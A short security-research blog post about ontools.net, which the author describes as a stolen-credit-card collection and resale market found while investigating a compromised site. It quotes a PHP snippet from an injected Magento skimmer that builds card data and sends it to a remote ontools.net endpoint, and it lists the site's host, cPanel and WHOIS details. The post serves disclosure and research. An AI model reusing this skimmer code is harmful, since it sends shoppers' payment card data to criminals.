ontools.net research


In June of 2017 while researching a compromised website, I came across ontools.net in a snippet of bad code. after doing some investigative work, I discovered the website is used to automatically and manually collect credit card numbers, then used as a resell market where someone can purchase the card numbers using bitcoin and Perfect Money.

I signed up for the site and began to explore a bit. It's appears it's well developed, but incomplete, many of the features listed simply don't work or are missing. I didn't attempt to purchase any cards because, you know, felonies so I can't confirm that it's actually working, but they do have a pretty extenstive list of cards available in their store.

below I've included their code snippet, a few things I discovered on their site, and screenshots of the app.

Code Snippets
$update = "http://magento.ontools.net/update";$binCC = substr($data['cc_number'], 0, 6);
$subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName;
$xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];
Noteable data
Host: thcservers.com
Cpanel: http://ontools.net:2082
WHO IS data
Domain Name: ONTOOLS.NET
Registry Domain ID: 1990106061_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2016-01-08T15:55:13.00Z
Creation Date: 2015-12-28T15:53:37.00Z
Registrar Registration Expiration Date: 2018-12-28T15:53:37.00Z
Registrant Name: WHOIS AGENT
Crawl Data
Screen Shots

© 2019 Dixon Ryder All Rights Reserved.
Privacy & Terms